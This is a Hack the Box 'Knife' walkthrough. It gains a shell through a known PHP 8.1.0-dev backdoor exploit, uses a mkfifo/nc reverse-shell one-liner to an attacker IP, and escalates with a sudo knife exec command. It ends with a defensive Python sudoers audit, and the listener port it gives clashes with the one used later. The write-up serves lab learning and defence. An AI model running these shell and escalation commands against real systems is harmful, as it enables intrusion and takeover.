Knife HacktheBox Walkthrough
Today we are going to solve the Hack the Box lab named Knife. The purpose is to accept the challenge and root the machine, using remote code execution and sudo rights to pwn the victim’s machine.
Table of Contents
- RCE (Python)
- Sudo Rights
Kali: Attacker Machine
Victim’s Machine: HTB
Run Nmap to find the open ports and services.
nmap -A 10.129.223.91
As per the Nmap result, two ports are open, i.e. port 80 (HTTP) and port 22 (SSH).
So our only avenues of attack are port 80 and port 22.
At first glance, we browse port 80 in the web browser, but nothing informative turns up there.
Without losing hope, we move on to the web scanner tool “Nikto” to find any vulnerabilities. Run the command below; the output reveals the X-Powered-By header, which is set to PHP/8.1.0-dev.
nikto -h 10.129.223.91
Let’s Google for a PHP 8.1 exploit.
From the search we find that this PHP 8.1 build is vulnerable and allows remote code execution. If this version runs on a server, an attacker can execute arbitrary code via the User-Agent header.
On Exploit-DB, we find the exploit EDB-ID 49933. Download the script from the link below and save it.
Execute the downloaded script on Kali and enter the full host URL of the victim’s machine (the HTB machine). Simultaneously, run a netcat listener on port 1234 in the next terminal.
nc -lvp 2334
python3 49933.py http://10.129.223.91
In the above screenshot, the shell we get is garbled. Let’s upgrade to a reliable shell.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.100 1234 >/tmp/f
Wow!! On the netcat terminal we have a session. Now the enumeration journey starts, and we get user.txt.
But our hunger is for root.txt. Let’s proceed to the root flag.
I notice something interesting with sudo rights.
As shown in the above screenshot, user james may run /usr/bin/knife as root, because he has sudo privileges for it with no password required.
Let’s see what GTFOBins says about knife:
Knife: This is capable of running ruby code. If the binary is allowed to run as a superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
Below is the command to run:
sudo /usr/bin/knife exec -E 'exec "/bin/sh"'
cd /root
ls
cat root.txt
Finally, we capture the flag.
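From the defender's side, the fix is to remove or tighten the NOPASSWD grant. The following audit, an added example that is not part of the original walkthrough, parses sudoers-style lines (as reported by sudo -l) and flags passwordless grants of binaries that can execute arbitrary code, such as knife. The SHELL_CAPABLE list and the sample entries are assumptions constructed for the example.

```python
import posixpath
import re
from dataclasses import dataclass

# Binaries that keep root privileges and can run arbitrary code when allowed via sudo.
# "knife" is the one on this page; the rest are an assumed, deliberately short starter list.
SHELL_CAPABLE = {"knife", "ruby", "python", "python3", "perl", "bash", "sh"}
# Simplified sudoers grammar:  user hosts = (runas) TAG: cmd, cmd   (aliases not handled)
SUDOERS_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<hosts>[^\s=]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)

@dataclass
class Finding:
    user: str
    command: str
    reason: str

def audit_sudoers(lines):
    """Return the passwordless grants that amount to root code execution."""
    findings = []
    for raw in lines:
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line or line.startswith("Defaults"):
            continue
        m = SUDOERS_RE.match(line)
        if not m:
            continue
        tags = {t for t in re.split(r"[:\s]+", m["tags"]) if t}
        if "NOPASSWD" not in tags:
            continue  # a password prompt is still a control; not flagged here
        for cmd in (c.strip() for c in m["cmds"].split(",")):
            if not cmd:
                continue
            binary = cmd if cmd == "ALL" else posixpath.basename(cmd.split()[0])
            if cmd == "ALL" or binary in SHELL_CAPABLE:
                findings.append(Finding(m["who"], cmd, f"NOPASSWD root run of {binary}"))
    return findings

# Constructed sample, modelled on the sudo -l result described in the walkthrough.
SAMPLE = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
james   ALL=(ALL) NOPASSWD: /usr/bin/knife
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart nginx, /usr/bin/ruby
"""
```

Running audit_sudoers(SAMPLE.splitlines()) reports the james/knife entry and the deploy/ruby entry, while the password-protected root and %admin entries and the systemctl grant pass.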
Author: Nisha Sharma is an experienced and certified Security Consultant, highly skilled in infrastructure and web pentesting along with SIEM and other security devices. Connect with her here.